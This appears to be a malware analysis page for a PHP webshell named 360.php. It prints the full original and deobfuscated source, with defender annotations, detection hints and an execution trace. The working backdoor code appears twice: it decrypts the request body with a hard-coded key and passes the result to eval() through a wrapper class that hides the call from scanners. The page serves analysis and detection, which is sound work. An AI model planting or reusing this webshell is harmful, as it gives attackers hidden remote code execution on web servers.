PHP Malware Analysis

360.php

md5: 050a8c1dbd653485ef24387285175fe0


Screenshot


Attributes

Encoding

Environment

Execution

Files

Input


Deobfuscated PHP code

<?php

// Analyst annotations (defender view). These comments are not part of the sample
// whose md5 is listed on this page.
// Purpose: read the raw HTTP request body, decode it with a hard-coded 16-byte key,
// and split the result into two '|'-separated fields. The second field is later
// passed to eval() further down the script.
// NOTE(review): the key value and overall structure resemble publicly documented
// "Behinder"-style PHP webshells; confirm against your own signatures.
// Triage hints: the recorded trace shows the file under a web-served uploads
// directory; PHP execution should be disabled there, and requests with opaque
// bodies sent to such paths are worth hunting for in access logs.

// Set error reporting to level 0; the '@' also suppresses any error raised by this call.
@error_reporting(0);
// Store the hard-coded key in the session under 'k', then write and close the session.
session_start();
$key = "e45e329feb5d925b";
$_SESSION['k'] = $key;
session_write_close();
// Raw request body: fully controlled by whoever sends the request.
$post = file_get_contents("php://input");
if (!extension_loaded('openssl')) {
    // Fallback when the openssl extension is not loaded: base64-decode the body,
    // then XOR every byte with a key byte.
    // $t is assigned but never used in this deobfuscated listing.
    $t = "base64_decode";
    $post = base64_decode($post . "");
    for ($i = 0; $i < strlen($post); $i++) {
        // '+' binds tighter than '&', so the index is ($i + 1) & 15: it wraps over
        // the 16 key bytes, starting at key offset 1.
        $post[$i] ^= $key[$i + 1 & 15];
    }
} else {
    // No IV and no options argument are passed, so PHP's defaults apply
    // (options = 0: the input is expected to be base64-encoded).
    // NOTE(review): "AES128" is presumably OpenSSL's alias for AES-128-CBC; confirm.
    // openssl_decrypt() returns false on failure, which is what the recorded
    // trace shows for an empty request body.
    $post = openssl_decrypt($post, "AES128", $key);
}
// Decoded layout is "<field0>|<field1>". $func is read but not used anywhere in
// the visible script. When the data holds no '|', $arr[1] is undefined and
// $params ends up NULL (as in the recorded trace).
$arr = explode('|', $post);
$func = $arr[0];
$params = $arr[1];
// Analyst annotation (defender view): callable wrapper whose only behaviour is to
// eval() whatever it is invoked with. In this script the argument derives from the
// request body, so this is the code-execution sink of the sample. A read of
// php://input that ends in eval() is a strong indicator for static scanning.
class C
{
    /**
     * Evaluates $p as PHP source.
     *
     * The `. ""` concatenation forces a string, so a NULL argument becomes ''
     * and the eval() is a no-op (the recorded trace shows this case).
     */
    public function __invoke($p)
    {
        eval($p . "");
    }
}
// Analyst annotation: invokes C::__invoke($params) through call_user_func(), so the
// eval() happens inside the class rather than as a direct top-level call on request
// data; presumably this is meant to sidestep simple static signatures.
// The '@' suppresses any error the call raises.
@call_user_func(new C(), $params);

Execution traces

data/traces/050a8c1dbd653485ef24387285175fe0_trace-1676241627.4161.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:40:53.313890]
1	0	1	0.000163	393512
1	3	0	0.000256	400136	{main}	1		/var/www/html/uploads/360.php	0	0
2	4	0	0.000274	400136	error_reporting	0		/var/www/html/uploads/360.php	2	1	0
2	4	1	0.000289	400176
2	4	R			0
2	5	0	0.000303	400136	session_start	0		/var/www/html/uploads/360.php	3	0
2	5	1	0.000357	400888
2	5	R			TRUE
1		A						/var/www/html/uploads/360.php	4	$key = 'e45e329feb5d925b'
1		A						/var/www/html/uploads/360.php	5	_SESSION['k'] = 'e45e329feb5d925b'
2	6	0	0.000401	401208	session_write_close	0		/var/www/html/uploads/360.php	6	0
2	6	1	0.000425	401104
2	6	R			TRUE
2	7	0	0.000439	401104	file_get_contents	0		/var/www/html/uploads/360.php	7	1	'php://input'
2	7	1	0.000459	401840
2	7	R			''
1		A						/var/www/html/uploads/360.php	7	$post = ''
2	8	0	0.000483	401800	extension_loaded	0		/var/www/html/uploads/360.php	8	1	'openssl'
2	8	1	0.000497	401840
2	8	R			TRUE
2	9	0	0.000510	401800	openssl_decrypt	0		/var/www/html/uploads/360.php	19	3	''	'AES128'	'e45e329feb5d925b'
2	9	1	0.000541	401904
2	9	R			FALSE
1		A						/var/www/html/uploads/360.php	19	$post = FALSE
2	10	0	0.000565	401800	explode	0		/var/www/html/uploads/360.php	21	2	'|'	FALSE
2	10	1	0.000579	402248
2	10	R			[0 => '']
1		A						/var/www/html/uploads/360.php	21	$arr = [0 => '']
1		A						/var/www/html/uploads/360.php	22	$func = ''
1		A						/var/www/html/uploads/360.php	23	$params = NULL
2	12	0	0.000643	402216	C->__invoke	1		/var/www/html/uploads/360.php	25	1	NULL
2	12	1	0.000658	402248
1	3	1	0.000666	402208
			0.000693	316664
TRACE END   [2023-02-12 20:40:53.314452]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
// Analyst annotations (defender view). These comments were added during review and
// are not part of the sample whose md5 is listed on this page.
// Purpose: read the raw request body, decode it with a hard-coded 16-byte key, and
// split it on '|'; the second field is eval()'d further down the script.
// Error reporting is set to 0 and the call itself is silenced with '@'.
@error_reporting(0);
session_start();
    // Hard-coded key, also stored in the session under 'k'.
    $key="e45e329feb5d925b";
	$_SESSION['k']=$key;
	session_write_close();
	// Raw request body: fully controlled by the requester.
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		// The function name is assembled from two string pieces and called through
		// a variable, so the literal token base64_decode( never appears in the file.
		// This is a common way to evade plain string-matching scanners.
		$t="base64_"."decode";
		$post=$t($post."");
		
		// XOR each decoded byte with a key byte; the index is ($i+1)&15 because '+'
		// binds tighter than '&', so it wraps over the 16 key bytes from offset 1.
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		// No IV or options are passed, so PHP defaults apply (base64-encoded input).
		// NOTE(review): "AES128" is presumably OpenSSL's alias for AES-128-CBC; confirm.
		$post=openssl_decrypt($post, "AES128", $key);
	}
    // $func is assigned but never used in the visible script; $params is the
    // second '|'-separated field and is what reaches eval().
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	// Analyst annotation: callable wrapper whose only behaviour is to eval() its
	// argument (forced to a string by ."" ); this is the code-execution sink of the sample.
	class C{public function __invoke($p) {eval($p."");}}
    // Analyst annotation: reaches eval() indirectly via call_user_func() and
    // C::__invoke(); '@' suppresses any error the call raises.
    @call_user_func(new C(),$params);
?>